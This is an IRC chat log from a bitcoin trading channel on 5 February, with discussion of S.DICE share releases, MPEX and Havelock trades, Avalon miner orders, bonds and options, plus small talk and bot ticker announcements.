umm Feb 05 11:00:07 s.dice traded 5k today./ Feb 05 11:00:10 huh? what fuck up Feb 05 11:00:25 i know avalon fucked up batch order no 2 Feb 05 11:00:28 weren't people selling their cookies of walletbit a few days ago ? Feb 05 11:00:30 ya is what i mean Feb 05 11:00:33 o nm, typo, 2 not 1 Feb 05 11:00:37 LOL Feb 05 11:00:46 lol Feb 05 11:00:48 u scared me Feb 05 11:00:58 yifu told me there are quite a few orders Feb 05 11:01:03 that have gone unpaid for and will be expired soon Feb 05 11:01:06 and will go back up Feb 05 11:01:09 i didnt even get thru Feb 05 11:01:17 ill try to snag an avalon Feb 05 11:01:17 mhm Feb 05 11:01:19 1st blotch or 2nd? Feb 05 11:01:22 2nd Feb 05 11:01:24 [HAVELOCK] [SDICE] 5 @ 0.765 = 3.825 BTC [+] Feb 05 11:01:25 really? Feb 05 11:01:27 2nd worked fine for us Feb 05 11:01:30 Theres a company here, avalon milk Feb 05 11:01:37 its such a good company Feb 05 11:01:42 delicious milk.. Feb 05 11:01:42 ^ Feb 05 11:01:47 i'm pretty sure they are unrelated. ;) Feb 05 11:01:56 i know. but avalon stuff is good Feb 05 11:02:00 milk or asic or otherwise Feb 05 11:02:01 :P Feb 05 11:02:16 I bought a fun domain off someone on the forums couple days ago Feb 05 11:02:21 having fun doing some side code with it Feb 05 11:02:33 gonna put one of my avalons on it for sale Feb 05 11:02:34 >:P~ Feb 05 11:02:36 Theres a company here, avalon milk << kakobrekla Feb 05 11:03:09 http://www.avalondairy.com/ Feb 05 11:03:16 best milk ever Feb 05 11:03:22 theyve been doing it for a while now Feb 05 11:07:19 Looks like flipping of shares have started Feb 05 11:07:30 its like getting a free dice roll that wins Feb 05 11:09:18 well that was quick (sdice offering depleted ) Feb 05 11:10:38 lol people selling in the pts ? Feb 05 11:10:39 yeah Feb 05 11:10:51 Hey, I also catched some of those PTs Feb 05 11:10:59 Will sell back for more Feb 05 11:12:05 By the way, anyone selling DMC shares? Feb 05 11:12:12 I'd like to increase my stake in that Feb 05 11:12:33 jurov https://bitcointalk.org/index.php?topic=118551.msg1504142#msg1504142 Feb 05 11:12:38 you know what open interest is, right ? Feb 05 11:14:12 Thanks about the manual withdrawals... Feb 05 11:14:15 part Feb 05 11:15:06 You get fees income, better earn it. Manual withdrawal is a minimum it seems for exchanges. Feb 05 11:15:28 Or at least, a minimum is a small hot wallet that can be afforded to be lost. Feb 05 11:15:46 !ticker havelock Feb 05 11:15:47 It says some pelt-wearin' trapper, some stinkin' bean-suckin' possum skinner, he's gonna collect that reward money. Feb 05 11:15:57 .. i fail. someone show me how its done Feb 05 11:16:46 "2013-02-05 04:00:59 5 ฿0.76500000 ฿3.8250 2013-02-05 03:37:00 12 ฿0.53210000 ฿6.3852 2013-02-05 02:27:59 24 ฿0.53210000 ฿12.7704 2013-02-05 02:26:59 3 ฿0.55000000 ฿1.6500 2013-02-05 02:26:00 5 ฿0.60000000 ฿3.0000" Feb 05 11:16:55 nam? Feb 05 11:16:56 Mhm, disregard that, it's an eyesore Feb 05 11:17:07 there are a bunch of DMC for sale on BF Feb 05 11:17:30 [MPEX] [S.MPOE] 12750 @ 0.0007 = 8.925 BTC [+] Feb 05 11:17:48 Ukyo you gonna get with the assbot already ? Feb 05 11:18:10 anyone here play pc games Feb 05 11:18:15 MP: I am trying to finish a big thing for BF atm Feb 05 11:18:19 just wondering what does everyone do here? Feb 05 11:18:29 and have a handful of minor things to get done Feb 05 11:18:35 but Feb 05 11:18:47 once the API goes public, or if kako joins the API beta list Feb 05 11:18:50 he can just do it Feb 05 11:18:58 im 20 years old, i only work 6 months at a nursery selling plants, i love videogames, economics, sushi, typical kid Feb 05 11:19:15 are you guys like me? or are you guys old wealthy secret illuminati Feb 05 11:19:31 mircea_popescu is the oldest. Feb 05 11:19:32 :P Feb 05 11:19:44 i know theres a 13 year old kid on btctalk Feb 05 11:20:07 im under the impression most traders here are young people who can take the risk Feb 05 11:20:20 who dress casually.. not those wall street peeps Feb 05 11:21:09 when I look at the mt gox tracker thread I find it comical people post pictures of rockets, walls, ect Feb 05 11:21:11 why would illumi's be interested in bitcoin though Feb 05 11:21:25 dunno. we could be the new world order Feb 05 11:21:26 lol Feb 05 11:21:37 and with that Feb 05 11:21:39 I am gonna make some food Feb 05 11:21:39 :P Feb 05 11:21:59 yeah man. speaking of food. i got some free coffee from a bitcoin user Feb 05 11:22:10 there was an episode of "The Goodwife" about bitcoin being a threat to the govt Feb 05 11:22:21 he gave it away due to rally which made people spend less likely spend bitcoins Feb 05 11:22:26 bitcoin won the case afai can recall Feb 05 11:23:20 im in my 30s, retired a decade ago, lived in the states, mexico, costa rica, eventually got bored Feb 05 11:23:40 how does one retire at 30 gtfo Feb 05 11:23:44 i've always worn a suit and i never was employed. Feb 05 11:23:49 i was 24. Feb 05 11:23:56 at the time Feb 05 11:24:00 pics or it didnt happen Feb 05 11:24:10 what'd you like to see ? Feb 05 11:24:31 like non pixelized jpeg of u in a suit lol Feb 05 11:24:59 um k Feb 05 11:25:21 something that proves it Feb 05 11:25:26 mhm Feb 05 11:25:32 without giving away your bank details Feb 05 11:25:32 yeah, im a bored 20 year old Feb 05 11:25:33 lol Feb 05 11:25:44 [04:22:09] there was an episode of "The Goodwife" about bitcoin being a threat to the govt Feb 05 11:25:51 not exactly Feb 05 11:26:12 http://trilema.com/wp-content/themes/trilema/images/ Feb 05 11:26:15 well they did say it was being used like money Feb 05 11:26:20 pick one from there, they're the historical background pix of my blog Feb 05 11:26:47 the bg_ stuff Feb 05 11:27:05 http://trilema.com/wp-content/themes/trilema/images/bg_ian2010.jpg that one is prolly bitcoin-adequate :D Feb 05 11:27:11 good looking guy! Feb 05 11:27:25 mhm, not bad. Feb 05 11:27:35 so mp, you have a degree in finance? Feb 05 11:28:13 these very nice pictures still dont prove ure balling Feb 05 11:28:17 you're sitting ontop of one of the biggest btc compannies.. Feb 05 11:28:30 truffles, im sure he's balling rightnow with mpex and all Feb 05 11:28:34 i love playing monopoly! Feb 05 11:28:45 i have no idea what that is Feb 05 11:29:52 i have a problem with a system that only nerdy people want to jump on board with Feb 05 11:30:01 hi guys Feb 05 11:31:38 MP: whats up with teh monopoly knock off board? Feb 05 11:31:39 :P Feb 05 11:31:51 anyone knows how the zero confirmation on SD works? I mean I understand that there is transaction 1, that is the bet and transaction 2 that is the price and t2 takes its output from t1, but what prevents the attacker from waiting to see t2 and then try to stop t1 by invalidating it (e.g. double spend) ? Feb 05 11:32:34 t1 t2 what langugage is this heh Feb 05 11:32:54 transaction 1, transaction 2 Feb 05 11:33:30 dont mind me, i have no technical experience with this Feb 05 11:33:43 truffles well, you wanted pix in a suit Feb 05 11:33:46 there's what, a dozen there Feb 05 11:34:01 oh i only looked at 2.. Feb 05 11:34:01 Ukyo i dunno. is it a knockoff ? Feb 05 11:34:08 was playing with some kids in a bar. Feb 05 11:34:11 let me go look at some more Feb 05 11:34:32 awkorama_ you prolly should ask dooglus or people in the forum sd watching thread Feb 05 11:34:36 they know more than us i imagine Feb 05 11:35:06 who took this pics ` Feb 05 11:35:27 it was PR Feb 05 11:35:28 theyre so cheeky lol Feb 05 11:35:29 :0 Feb 05 11:35:39 MPOE-PR took the pics ob Feb 05 11:35:50 [MPEX] [S.DICE] 600 @ 0.00564885 = 3.3893 BTC [-] Feb 05 11:35:52 [MPEX] [S.DICE] 400 @ 0.0071999 = 2.88 BTC [+] Feb 05 11:35:56 http://trilema.com/wp-content/themes/trilema/images/bg_mdld.jpg lol Feb 05 11:35:58 no it wasn't !? Feb 05 11:35:58 she has an awesome job Feb 05 11:36:02 they're over the course od many years Feb 05 11:36:05 mp i was joking lol Feb 05 11:36:10 the one by the seaside is in villahermosa i think Feb 05 11:36:22 the monopoly one is in timisoara Feb 05 11:36:23 like a boss Feb 05 11:36:32 the current one on trilema is in luxor Feb 05 11:36:40 MP, you are left handed no? Feb 05 11:36:44 nop Feb 05 11:36:50 im ambidextrous Feb 05 11:36:53 oh Feb 05 11:36:54 i see Feb 05 11:37:16 On that pic you had your watch on your right hand, normally people put it on their left if they are right handed Feb 05 11:37:22 but ambi is also fine i guess Feb 05 11:37:23 [MPEX] [S.DICE] 2500 @ 0.0071999 = 17.9998 BTC [+] Feb 05 11:37:35 http://trilema.com/wp-content/themes/trilema/images/bg_oct2010.jpg look like those guys from tv show "Fringe" Feb 05 11:37:42 what do they call em!! Feb 05 11:37:50 that's in frankfurt Feb 05 11:37:59 (obviously) Feb 05 11:38:05 and as far as ballinggoes... let me see here Feb 05 11:38:09 mhm, i see bear and bulls Feb 05 11:38:20 a bear and a bull Feb 05 11:38:21 they should add pig Feb 05 11:38:22 hurrrrrrrrrrrrrr Feb 05 11:38:28 http://trilema.com/2010/nsfw-mosu-cu-joarda/ Feb 05 11:38:30 Bowjob: what would that signify? a stale market? Feb 05 11:38:38 http://trilema.com/2011/nsfw-gradina-edenului/ Feb 05 11:38:49 stale would be bearish imo Feb 05 11:39:06 http://trilema.com/2010/a-nins-a-nins/ Feb 05 11:39:08 nsfw tsk tsk Feb 05 11:39:08 etc. Feb 05 11:39:12 Well, I was thinking of investor styles. Bears make money by shorting, Bulls make money buy holding Feb 05 11:39:19 and pigs lose money by shorting and holding Feb 05 11:39:31 Bowjob: oh, so pigs represent the 99%? Feb 05 11:39:52 well, im not sure is 99% of the investors lose money investing Feb 05 11:40:06 im pretty sure im losing if i did Feb 05 11:40:09 i've doubled my monies essentially holding dice.. so im not sure if its that hard Feb 05 11:40:20 They represent the idiots. Oddly politicians are often depicted as pigs. Feb 05 11:40:31 mhm Feb 05 11:41:23 somebody elected that pig so, what do we call the people` Feb 05 11:41:43 sheep Feb 05 11:42:13 just need a wolf to reign in those sheep and bam Feb 05 11:42:37 what do we call spectators then Feb 05 11:43:41 voyeurist?` Feb 05 11:44:19 lol Feb 05 11:44:23 thats not the term! Feb 05 11:44:54 what kinda term you looking for here Feb 05 11:45:05 bowjob im pretty bored too lol Feb 05 11:45:10 animal term for a spectator Feb 05 11:45:23 we have bulls, sheep, wolf, pig, bear Feb 05 11:45:29 oh Feb 05 11:45:50 rat, snail, cockroach? Feb 05 11:46:07 cockroach suits me thinks Feb 05 11:46:14 for a spectator? Feb 05 11:46:24 yea they never die Feb 05 11:46:37 unless u mean speculator? Feb 05 11:46:37 no, cockroaches get squashed.. spectators dont Feb 05 11:46:42 no i dont mean speculator Feb 05 11:46:43 lol Feb 05 11:46:55 what animal doesnt get killed Feb 05 11:46:58 owl. Feb 05 11:47:03 yes, mp got it Feb 05 11:47:11 ok.. Feb 05 11:47:13 owl far from reach of the chaos Feb 05 11:49:38 well lying in the shadows is that owl hunter Feb 05 11:50:14 [MPEX] [S.MPOE] 13850 @ 0.0007 = 9.695 BTC [+] Feb 05 11:50:51 this is a wierd convo Feb 05 11:51:28 ure a weird dude Feb 05 11:52:16 *shurgs Feb 05 11:52:39 What's a shurgs? =P Feb 05 11:53:00 better to have known enemy than an unknown one Feb 05 11:53:12 http://market-ticker.org/akcs-www?post=217077 Feb 05 11:53:14 ure wierd shurgs... you guys speak a curious dialect. Feb 05 11:53:18 mpex not hacked. fedwire hacked? Feb 05 11:53:23 I can't spell anymore. I've graduated hs 3 years ago Feb 05 11:53:26 bitcoin 1 : fiat 0. Feb 05 11:53:45 I got some 87% in english which means that my english has deteriorated somewhat Feb 05 11:54:09 wont find me speaking the queens english in a non-essay format Feb 05 11:54:54 fedwire.. must google.. Feb 05 11:55:18 Let's have a moment of silence for the poor people at Havelock who panic sold earlier. Feb 05 11:55:50 well... they were trading as high as 82 or something Feb 05 11:55:57 in spite of the div cut Feb 05 11:56:07 so, if they can go 10% over they should be ok with 10% under too neh ? Feb 05 11:56:22 [MPEX] [S.MPOE] 9450 @ 0.0007 = 6.615 BTC [+] Feb 05 11:56:26 umm, its more than 10% under earlier Feb 05 11:56:30 it went to 0.52 Feb 05 11:56:41 a ok Feb 05 11:56:50 well, i was going by avgs Feb 05 11:56:53 everythings back to normal Feb 05 11:56:54 but you have a point Feb 05 11:56:59 is this BTC related speak or economic related Feb 05 11:57:28 its mpex realted!!!!! Feb 05 11:57:31 winwinwinwin Feb 05 11:58:17 operated by Mircea Popescu of Romania hmmm Feb 05 11:58:24 are u affiliated? Feb 05 12:00:12 http://trilema.com/2013/breaking-bitcoin-1-fiat-0/ Feb 05 12:00:13 lalala Feb 05 12:00:17 truffles hm ? Feb 05 12:00:52 !ticker Feb 05 12:00:53 ure happy about something so im assuming u own shares or somethng Feb 05 12:00:53 I prepared your canoe with cedar boughs. Feb 05 12:00:58 ;;ticker Feb 05 12:00:59 BTCUSD ticker | Best bid: 20.45612, Best ask: 20.56889, Bid-ask spread: 0.11277, Last trade: 20.45612, 24 hour volume: 45913.24160064, 24 hour low: 19.85502, 24 hour high: 20.89000, 24 hour vwap: 20.33950 Feb 05 12:01:43 truffles i own a majority stake in mpex Feb 05 12:02:00 oh well i hope that works out for u Feb 05 12:04:41 so can one buy a 5 year bond in BTC currency? Feb 05 12:06:41 5 years is an eternity in bitcoin timeline Feb 05 12:06:50 truffles you could buy mpoe bonds and stick with them for 5 years Feb 05 12:06:57 they pay interest monthly. Feb 05 12:07:02 there are some people going on 1yr+ bynow Feb 05 12:08:04 just curious about that Feb 05 12:08:11 the interest rate has been really good to investors so far Feb 05 12:08:19 i mean i still havent figured out how this btc works wont dare go that far Feb 05 12:08:29 it did pay 6k or whatever last month Feb 05 12:08:54 one would think the software writers could have at least put in the option for english language Feb 05 12:10:10 being that its one complex system ... Feb 05 12:11:22 is this channel always this lively heh Feb 05 12:11:36 gonna go kill some zombies! Feb 05 12:11:55 anyone played the walking dead? Feb 05 12:12:00 best zombie game ever Feb 05 12:13:05 nah Feb 05 12:13:08 blackops 2 Feb 05 12:21:25 [HAVELOCK] [SDICE] 4 @ 0.765 = 3.06 BTC [+] Feb 05 12:49:12 [MPEX] [S.MPOE] 4321 @ 0.0006959 = 3.007 BTC [-] Feb 05 12:49:13 [MPEX] [S.MPOE] 5379 @ 0.00069576 = 3.7425 BTC [-] Feb 05 12:55:11 the walking dead tv is getting good Feb 05 12:58:23 im not that into video games, but when i play, blackops is my game Feb 05 13:19:25 [MPEX] [S.MPOE] 4321 @ 0.00069602 = 3.0075 BTC [+] Feb 05 13:19:27 [MPEX] [S.MPOE] 5529 @ 0.00069576 = 3.8469 BTC [-] Feb 05 13:27:05 [MPEX] [S.MPOE] 6800 @ 0.00069991 = 4.7594 BTC [+] Feb 05 13:27:11 [MPEX] [S.MPOE] 2550 @ 0.00069994 = 1.7848 BTC [+] Feb 05 13:50:29 https://bitcointalk.org/index.php?topic=141287.0 Feb 05 13:50:33 this will no doubt go over well. Feb 05 13:54:15 [MPEX] [S.MPOE] 4321 @ 0.00069577 = 3.0064 BTC [-] Feb 05 13:54:17 [MPEX] [S.MPOE] 1431 @ 0.00069576 = 0.9956 BTC [-] Feb 05 13:54:40 sigh Feb 05 13:54:48 maybe I should just throw my money away and invest it in mpex and sdice Feb 05 13:56:12 mircea_popescu: on mpex, how are dividends paid? Feb 05 13:58:30 when is next s.dice tranche going off? Feb 05 13:59:41 Diablo-D3 owner issues a DIVIDEND|x|Y|z command Feb 05 13:59:45 Bugpowder it wasn't said. Feb 05 14:00:03 any idea of the next price level? Feb 05 14:00:31 nope. Feb 05 14:00:57 okay so, i've some meetings to go to right now but ill be back later Feb 05 14:01:00 everyone don't panic! Feb 05 14:02:43 [MPEX] [S.MPOE] 5011 @ 0.00069576 = 3.4865 BTC [-] Feb 05 14:02:44 [MPEX] [S.MPOE] 4024 @ 0.00069311 = 2.7891 BTC [-] Feb 05 14:02:46 [MPEX] [S.MPOE] 12350 @ 0.0006919 = 8.545 BTC [-] Feb 05 14:02:47 [MPEX] [S.MPOE] 851 @ 0.00069001 = 0.5872 BTC [-] Feb 05 14:02:49 [MPEX] [S.MPOE] 40000 @ 0.00069001 = 27.6004 BTC [-] Feb 05 14:02:50 [MPEX] [S.MPOE] 42000 @ 0.00069001 = 28.9804 BTC [-] Feb 05 14:02:51 [MPEX] [S.MPOE] 155348 @ 0.00069 = 107.1901 BTC [-] Feb 05 14:02:54 [MPEX] [S.MPOE] 8178 @ 0.00069 = 5.6428 BTC [-] Feb 05 14:02:56 [MPEX] [S.MPOE] 723 @ 0.00068913 = 0.4982 BTC [-] Feb 05 14:03:23 People panicked... Feb 05 14:05:37 [MPEX] [S.MPOE] 2677 @ 0.00068913 = 1.8448 BTC [-] Feb 05 14:05:38 [MPEX] [S.MPOE] 10900 @ 0.00068827 = 7.5021 BTC [-] Feb 05 14:05:40 [MPEX] [S.MPOE] 423 @ 0.00068749 = 0.2908 BTC [-] Feb 05 14:07:29 [MPEX] [S.MPOE] 10808 @ 0.00068749 = 7.4304 BTC [-] Feb 05 14:07:31 [MPEX] [S.MPOE] 8661 @ 0.00068721 = 5.9519 BTC [-] Feb 05 14:07:34 [MPEX] [S.MPOE] 13300 @ 0.0006871 = 9.1384 BTC [-] Feb 05 14:07:36 [MPEX] [S.MPOE] 10438 @ 0.00068678 = 7.1686 BTC [-] Feb 05 14:07:38 [MPEX] [S.MPOE] 15324 @ 0.00068663 = 10.5219 BTC [-] Feb 05 14:07:40 [MPEX] [S.MPOE] 5552 @ 0.00068625 = 3.8101 BTC [-] Feb 05 14:07:42 [MPEX] [S.MPOE] 1300 @ 0.00068411 = 0.8893 BTC [-] Feb 05 14:07:42 [MPEX] [S.MPOE] 5600 @ 0.00068333 = 3.8266 BTC [-] Feb 05 14:07:44 [MPEX] [S.MPOE] 3150 @ 0.00068292 = 2.1512 BTC [-] Feb 05 14:07:47 [MPEX] [S.MPOE] 4800 @ 0.00068264 = 3.2767 BTC [-] Feb 05 14:07:49 [MPEX] [S.MPOE] 7850 @ 0.00068242 = 5.357 BTC [-] Feb 05 14:07:51 [MPEX] [S.MPOE] 9950 @ 0.00068227 = 6.7886 BTC [-] Feb 05 14:07:53 [MPEX] [S.MPOE] 6000 @ 0.00068225 = 4.0935 BTC [-] Feb 05 14:07:56 [MPEX] [S.MPOE] 22350 @ 0.00068223 = 15.2478 BTC [-] Feb 05 14:07:57 [MPEX] [S.MPOE] 5040 @ 0.00068186 = 3.4366 BTC [-] Feb 05 14:08:01 [MPEX] [S.MPOE] 19877 @ 0.00068178 = 13.5517 BTC [-] Feb 05 14:08:21 Going to meetings is apparently bad for the price of assets =P Feb 05 14:09:58 [06:59:40] Diablo-D3 owner issues a DIVIDEND|x|Y|z command Feb 05 14:10:29 mircea_popescu: yeah, but Ive never used mpex, I thought it was all pgp signed contracts and shit and didnt actually rely on the mpex servers that much Feb 05 14:11:22 this is pgp signed Feb 05 14:11:31 every actions Feb 05 14:12:07 Aye Feb 05 14:14:43 Hmm, some people have put up a part of the S.DICE back on sale in the 0.0069 range Feb 05 14:16:55 [BTCTC] [GSDPT] 460 @ 0.0051 = 2.346 BTC [+] Feb 05 14:17:27 I really wonder what evoorhees will do for the next slices Feb 05 14:18:37 I am ready for the next slice Feb 05 14:19:03 don't panic people Feb 05 14:19:21 the demand will be able to absorb these shares. Feb 05 14:19:24 Will they all get eaten up like that? Feb 05 14:19:33 Probably... there was tons of deposits Feb 05 14:20:13 how fast did the first tranche go? Feb 05 14:21:04 Like hmm... Feb 05 14:21:13 now the 20K BTC wall is down at $21 Feb 05 14:21:21 heh Feb 05 14:21:34 that could eat 4M shares pretty quick Feb 05 14:22:38 does it still cost money to get an mpex account? Feb 05 14:23:19 30 BTC / 25 BTC with referal Feb 05 14:23:35 24 if you use mine, i'll back you 1BTC i receive Feb 05 14:23:58 fuck that. Feb 05 14:24:05 mpex is still a scam then Feb 05 14:24:11 lol Feb 05 14:24:41 Took near 5 hours Feb 05 14:24:41 RELEASE THE SHARES! Feb 05 14:24:44 to sell all Feb 05 14:24:47 OK good Feb 05 14:24:51 well Feb 05 14:24:56 some people were asleep Feb 05 14:25:01 yeah Feb 05 14:25:08 They'll bite their fingers Feb 05 14:25:21 Just like I have from time to time =/ Feb 05 14:25:36 Diablo-D3 you can trade via a passthrough Feb 05 14:25:51 yeah but that means the passthrough guy can just steal the shares Feb 05 14:26:28 I'll be doing passthroughs for these Feb 05 14:26:32 yes that's a scam Feb 05 14:27:07 If approved, that is Feb 05 14:27:18 yes Feb 05 14:27:27 I dunno, Im not even sure if I want to do business with avalon Feb 05 14:27:42 just to answer [13:24] mpex is still a scam then Feb 05 14:28:33 but for me, mp has to lower the fees Feb 05 14:28:44 because BTC gained lot of value last month Feb 05 14:28:51 Which he will not do. Feb 05 14:29:03 It's perfect like that to him. Feb 05 14:29:39 he can't maintain that on a long term Feb 05 14:31:05 whos selling what? Feb 05 14:32:18 ;;ticker Feb 05 14:33:34 EskimoBob_afk: more context Feb 05 14:33:52 an opportunity, house or something Feb 05 14:34:14 bankers don't give garantee for this business imo Feb 05 14:34:38 cash is king Feb 05 14:34:54 they are releasing more sdice? Feb 05 14:35:27 cashing out could imply a couple things Feb 05 14:35:52 they could be coming under regulatory pressure Feb 05 14:36:04 so the sdice gravy train is over? Feb 05 14:36:22 wouldn't surprise me Feb 05 14:36:59 when you flaunt something like sdice around someone with meatspace power will take notice before long Feb 05 14:37:39 it's like nefario talking about how the authorities can't shut down glbse Feb 05 14:37:40 it's also a marketing experience I think Feb 05 14:37:54 gigavps: fuck nefario Feb 05 14:38:00 fucking asshole Feb 05 14:38:11 hes basically ruined bitcoin Feb 05 14:38:17 +1 giga Feb 05 14:38:37 people keep asking why i have a claims process Feb 05 14:38:57 well, i don't want to end up like nefario and GLBSE Feb 05 14:39:40 Im still wondering if I should go ahead with dmc 2.0 or not Feb 05 14:41:36 Diablo-D3, if you don't have a lawyer and a plan, that should tell you want to do, then....... Feb 05 14:41:55 gigavps: that actually is on the plan Feb 05 14:42:16 LLC registered in the state of maine, an actual office that isnt in my home, a lawyer, an accountant Feb 05 14:43:25 and before you ask why maine, because its a lot easier to talk the state into doing things when you actually pay taxes here Feb 05 14:44:02 and maine needs this more than any of the other states Feb 05 14:45:04 hi all Feb 05 14:45:21 so erik decided to drop the bomb when neither me nor mp is around Feb 05 14:45:29 what bomb? Feb 05 14:45:56 the news Feb 05 14:46:01 he IPO'd at 0.0044 Feb 05 14:46:11 https://bitcointalk.org/index.php?topic=101902.msg1504386#msg1504386 Feb 05 14:46:14 what was he ipoing? Feb 05 14:46:35 looky: http://blockchain.info/address/1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx Feb 05 14:46:49 oh Feb 05 14:46:55 so erik = evoorhees? Feb 05 14:47:00 and evorhees owns sdcie? Feb 05 14:47:01 yes Feb 05 14:47:03 yes Feb 05 14:47:12 not exactly Feb 05 14:47:15 but yes Feb 05 14:47:57 so why is he selling shares? Feb 05 14:48:02 sdice has no equity Feb 05 14:51:54 I dunno, I wonder how feasable it is to raise about 10 million dollars Feb 05 14:52:52 ;;ticker Feb 05 14:52:53 BTCUSD ticker | Best bid: 20.60667, Best ask: 20.64899, Bid-ask spread: 0.04232, Last trade: 20.60667, 24 hour volume: 39228.27897107, 24 hour low: 19.85502, 24 hour high: 20.70000, 24 hour vwap: 20.32508 Feb 05 14:53:04 ;;calc 10000000 / 20 Feb 05 14:53:04 500000 Feb 05 14:56:26 [HAVELOCK] [SDICE] 6 @ 0.759 = 4.554 BTC [-] Feb 05 14:57:28 sigh. Feb 05 14:57:50 maybe I should just guarantee something like 5% APY over a 10 year period Feb 05 14:58:25 Diablo-D3, sound like you need to speak with a lawyer Feb 05 15:03:38 [MPEX] [S.MPOE] 3850 @ 0.00068178 = 2.6249 BTC [-] Feb 05 15:03:39 [MPEX] [S.MPOE] 9550 @ 0.00069797 = 6.6656 BTC [+] Feb 05 15:05:40 i'm going to ask a lawyer some questions re investing in S.DICE Feb 05 15:10:55 [MPEX] [S.MPOE] 1771 @ 0.00069994 = 1.2396 BTC [+] Feb 05 15:10:57 [MPEX] [S.MPOE] 6074 @ 0.0007 = 4.2518 BTC [+] Feb 05 15:14:42 gigavps: eventually, yes Feb 05 15:14:52 gigavps: the problem is, the bitcoin community just doesnt have the cash Feb 05 15:14:58 I dont even know where most of the coins are Feb 05 15:15:03 I imagine they've been lost Feb 05 15:17:15 [MPEX] [S.MPOE] 5250 @ 0.00069509 = 3.6492 BTC [-] Feb 05 15:19:00 They travelled from hand to hand, to end up being gambled and lost on SatoshiDice Feb 05 15:19:58 and paid on dividends :P Feb 05 15:20:42 the great bitcoinmixer: sdice ^^ Feb 05 15:21:22 Diablo-D3, "the bitcoin community just doesnt have the cash" is an absurd statement Feb 05 15:21:48 sdice just collected another $60k Feb 05 15:21:53 to borrow from mp "most everyone" doesn't have the cash Feb 05 15:22:06 avalon just collected $1m Feb 05 15:22:42 you are in a community where the main topic is a new form of currency / bartering / trading Feb 05 15:29:14 [MPEX] [S.MPOE] 4321 @ 0.00068142 = 2.9444 BTC [-] Feb 05 15:29:16 [BTCTC] [GSDPT] 1000 @ 0.007 = 7 BTC [+] Feb 05 15:29:17 [MPEX] [S.MPOE] 6829 @ 0.00068141 = 4.6533 BTC [-] Feb 05 15:30:22 ;;last Feb 05 15:30:23 [05:29:15] [MPEX] [S.MPOE] 6829 @ 0.00068141 = 4.6533 BTC [-] Feb 05 15:30:27 heh Feb 05 15:33:04 Hello thick Feb 05 15:33:08 Hey thanks Feb 05 15:43:24 Not much happening at this time of the day however. Feb 05 15:43:27 Hehe, indeed, I just wanted to make sure I was in the loop Feb 05 15:43:28 Most active around 8pm - 2 am Eastern Time I'd say Feb 05 15:43:28 Cool Feb 05 15:43:40 As for me well... I'm out for today Feb 05 15:43:55 Did you get a chance to nab new shares on S.DICE? Feb 05 15:43:59 With the S.DICE stuff I haven't slept all night. Feb 05 15:44:07 Yeah, I nabbed almost 50k Feb 05 15:44:32 hi all Feb 05 15:44:37 crazy morning huh? Feb 05 15:44:37 hello mjr Feb 05 15:44:39 hi mjr__ Feb 05 15:44:39 yeah me too, I slept about 3 hrs Feb 05 15:44:41 yeah Feb 05 15:44:49 you guys on reddit? Feb 05 15:44:53 ugh Feb 05 15:44:57 yea some of us Feb 05 15:45:01 i had to wait for BTC to clear to send to DeadTerra Feb 05 15:45:19 haven't heard from Dead as to whether he was able to make trhe purchase for me in time... Feb 05 15:45:29 mjr__: can you pls help me to wrap my head around https://bitcointalk.org/index.php?topic=118551.msg1504855#msg1504855 ? Feb 05 15:45:36 Eh, it's hard moving fast through a broker Feb 05 15:45:51 or anyone else... how to make out open interest on mpex options? Feb 05 15:46:16 just add the volume for all options sold in this month? Feb 05 15:46:23 i don't get it Feb 05 15:46:30 yeah, I actually saw it the moment erik posted them and pm'd Dead, but he didn't sign on for 2 or 3 hours Feb 05 15:46:40 not sure how we can calculate it Feb 05 15:46:47 but it basically means how many contracts exist Feb 05 15:46:55 ie. how many options are currently out there Feb 05 15:47:07 i sell an option...in order to do that someone has to buy it Feb 05 15:47:12 And as you might know Thick, I also run BTC-BOND & I am co-partner in BitVPS Feb 05 15:47:28 and on a darker note, I also run BTC-MINING Feb 05 15:47:34 so, as these are not "settled" ie. i haven't exercised he hasn't been assigned Feb 05 15:47:40 hmmm... so if mpoe bot buys back option issued by itself earlier Feb 05 15:47:47 it decreases the open interest Feb 05 15:47:49 ? Feb 05 15:47:59 yeah i am not exactly sure how many contracts mpoe is writing Feb 05 15:48:00 cool, I don't know much about BRCBOND, but I have looked at BitVPS Feb 05 15:48:11 EskimoBob_afk: none of them managed to derail the effort to bring BTC to $1000 Feb 05 15:48:13 nefario did Feb 05 15:48:19 I actually have a small hosting business, using Rackspace Feb 05 15:48:34 I have one of those too, owned personally Feb 05 15:48:54 so anyway, that;s all open interest is, but i don't know how to calculate it in this case Feb 05 15:49:02 I might have too much stuff going on. Feb 05 15:49:03 it would be related in some way to the volume Feb 05 15:49:29 mjr__ okay, is uspected that. will discuss it with MP. Feb 05 15:49:47 yeah, being "into" bitcoin definitely crowds your time too Feb 05 15:50:28 http://www.namworld.net/ is the url Feb 05 15:51:44 EskimoBob_afk: who knows Feb 05 15:52:19 I did? wow. I wish someone would have told me. Feb 05 15:52:38 @nam cool, i'll check it out Feb 05 15:53:06 yes, x ? y : z Feb 05 15:53:11 If I can get Amazingrando to pay back, that would be good news for DMC. Feb 05 15:53:16 its short for if than else Feb 05 15:53:22 considering DMC's BTC-MINING holdings Feb 05 15:54:26 [HAVELOCK] [SDICE] 5 @ 0.72 = 3.6 BTC [-] Feb 05 15:55:35 Namworld: yes Feb 05 15:58:16 Lending was a bad idea. Even if Amazingrando is in the US. Feb 05 16:02:34 [MPEX] [S.MPOE] 4471 @ 0.00068141 = 3.0466 BTC [-] Feb 05 16:02:35 [MPEX] [S.MPOE] 9200 @ 0.00068126 = 6.2676 BTC [-] Feb 05 16:02:37 [MPEX] [S.MPOE] 9100 @ 0.00068068 = 6.1942 BTC [-] Feb 05 16:02:38 [MPEX] [S.MPOE] 9079 @ 0.0006801 = 6.1746 BTC [-] Feb 05 16:03:32 ok, well I'm off for real this time. Feb 05 16:08:18 [MPEX] [S.MPOE] 4865 @ 0.00068408 = 3.328 BTC [+] Feb 05 16:10:25 so, is the consensus generally positive on the release of more shares? Feb 05 16:10:38 talking about S.DICE Feb 05 16:10:39 nope Feb 05 16:10:42 why is that? Feb 05 16:11:12 lots of reasons Feb 05 16:11:31 If someone gives out 100% of profits... Feb 05 16:11:32 for me, it's because I didn't like seeing my s.dice portfolio drop 40% in an instant Feb 05 16:11:38 how do they expand? Feb 05 16:12:00 you should be holding it for the ridiculous dividends Feb 05 16:12:03 all he had to do was set the next at market price Feb 05 16:12:11 and then compete with everyone else Feb 05 16:12:13 0.0073 or so Feb 05 16:12:17 his goal was to raise money Feb 05 16:12:18 yeah Feb 05 